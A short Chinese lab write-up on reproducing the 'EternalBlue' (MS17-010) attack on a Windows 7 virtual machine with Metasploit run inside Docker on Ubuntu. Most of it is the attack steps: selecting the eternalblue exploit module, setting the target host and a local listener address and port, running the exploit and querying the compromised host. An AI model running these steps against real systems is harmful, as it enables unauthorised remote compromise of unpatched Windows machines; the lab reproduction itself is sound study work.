docker使用metasploit进行“永恒之蓝”复现
1.实验环境
- win7虚拟机
- Ubuntu虚拟机
- 在Ubuntu上安装的docker
- 在docker中安装的metasploit
2.实验过程
- 进入root权限,查看docker镜像,查看metasploit的镜像id
使用命令
#sudo su
# docker images
- 运行metasploit容器
# docker run -it -p 443:443 edbbfac76261
- 搜索“永恒之蓝”漏洞的攻击有那些
永恒之蓝的代号为“ms17_010"
search ms17_010
- 选择第一种攻击方式
use exploit/windows/smb/ms17_010_eternalblue
show options
show options 可以看我们需要填那些参数,其中在require一栏,为yes的是必填的。
rhost:远程主机的IP地址
lhost:本机的IP地址
lport:本机的端口地址
- 设置好各种需要的参数
这里远程被攻击的主机为192.168.30.129
特别注意
docker里面的容器要和外界进行通信时需要进行端口映射的,容器使用docker的网络端口接收数据,在通过端口镜像来映射到容器当中的。所以在填写IP与端口是需要填写docker的IP,和docker与容器映射的端口,而不是容器的IP与容器的端口。
- 开始监听
exploit
- 连接成功过后就可以通过命令行获取主机的信息了,这里就例举了一个例子
sysinfo 获取主机的信息